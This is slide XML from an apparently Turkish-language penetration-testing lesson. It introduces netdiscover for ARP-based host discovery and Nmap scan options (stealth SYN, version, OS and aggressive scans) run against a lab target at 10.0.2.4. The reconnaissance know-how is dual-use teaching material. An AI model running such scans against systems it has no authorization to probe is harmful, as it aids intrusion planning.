                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> adresleri» üzerinden yaptığını bilmeliyiz. IP ve Mac adresleri ağ cihazlarımızın ARP tablosunda tuttuğunu da bilmeliyiz. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bu kısımda Linux içinde bulunan «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» aracını kullanacağız. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracı hakkında bilgi almak için </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>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komutu kullanılır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Resim 7" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625B6029-9984-D31E-9857-E95D0EBFD780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="971562" y="2121218"/>
            <a:ext cx="10443556" cy="4494847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2222157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552BA53-2F78-C65C-E640-39EA8003D81F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="485776"/>
            <a:ext cx="11658600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" u="sng" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" u="sng"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aracı bize aktif ve pasif(sessiz) tarama seçenekleri sunar. Aktif taramayı hızlı yaparken, pasif taramayı sessiz yapacağı için uzun sürecektir. Arp paketleri gönderdiği unutulmamalıdır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Resim 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09457DDB-A328-CB26-D1DC-C1F834B5D3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="1882091"/>
            <a:ext cx="11137900" cy="2261284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Resim 9" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F863ACDC-3C13-258A-5781-7BBA1351DED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="4143375"/>
            <a:ext cx="11137900" cy="2368551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Resim 13" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{126B0354-5ED7-FF2C-47F2-B28497361509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7550150" y="854076"/>
            <a:ext cx="4343400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Çerçeve 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4ECE033-6C61-5526-A11D-324A8B359DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3671888" y="1882091"/>
            <a:ext cx="1800225" cy="30389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1467377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997BFF1-9CBC-F39B-9AC8-A050FDE14A33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="120649" y="2089149"/>
            <a:ext cx="6946782" cy="776288"/>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04F5CC7F-6D44-2A5A-A6FD-A5DFB1F0641E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="120649" y="3055938"/>
            <a:ext cx="11541126" cy="3573462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Çerçeve 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949BE058-F786-4B41-5A12-C508DBB45537}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3028950" y="3011488"/>
            <a:ext cx="1471613" cy="45878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7" name="Çerçeve 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F62FA1C1-71E5-7344-9CD2-D543A9A2B502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="2391568"/>
            <a:ext cx="409575" cy="41433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9" name="Resim 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29852479-A31B-4623-0500-F12304320EE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="120649" y="815974"/>
            <a:ext cx="10377343" cy="498475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Çerçeve 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BECFFE2-EB1D-B1BB-6A86-8B49E9664361}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5557838" y="957263"/>
            <a:ext cx="538162" cy="3571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1" name="Çerçeve 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C3C419B-547A-EFC8-F6A5-1BE3268D6EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8820151" y="815974"/>
            <a:ext cx="538162" cy="49847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34140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cihaz, metre, ölçü aleti içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B420CDEC-DCDC-087F-02F7-B08CBD46ED71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735012" y="1034321"/>
            <a:ext cx="11277835" cy="4706912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56228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45A53B-C285-149E-CE7C-971656E94FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Aracı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E142D3-DCE5-71E7-CC2D-A1DA02BBE570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  açık kaynaklı bir araçtır. Ham paketler göndererek bilgi toplar ve bizler için analiz eder. Bu işlem sonucu bizlere ağda çalışan cihazları, mevcut ana bilgisayarları, sundukları hizmetleri, servisleri, açık bağlantı noktalarını, servis versiyonlarını  ve daha nice bilgiler sunun  araçtır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ağ yöneticileri, sızma testi uzmanları ve hackerler tarafından kullanılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kısaca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> hakkında kullanım bilgileri sunup hedef makine üzerinde tarama yapacağız.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2929911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68132D-40B8-DC34-2105-C80121C0B8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Aracı</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3347B7E9-5A16-D551-3559-337BD8DB7747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracı ile ağ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>hatitası</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> çıkarıyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sudo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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(TCP/SYN Gizli)</a:t>
            </a:r>
          </a:p>
          <a:p>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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> (VERSİYON)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>10.0.2.4 (Hedef Makine) ip adresi üzerinde olan açık portları ve servisleri öğreniyoruz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>O (İŞLETİM SİSTEMİ).    -A (AGRESİF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1069492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etin kutusu 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABEE6CC4-CE1E-09CC-F47F-C749454D3375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2098623" y="4597002"/>
            <a:ext cx="1994745" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tarama Türü/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2400" b="1" i="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Resim 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25D9D241-0EE1-939B-D821-BB540DD8DA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275896" y="1696785"/>
            <a:ext cx="11668454" cy="950263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Metin kutusu 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639B674F-EDF4-AB51-93C8-1F1EF6722208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
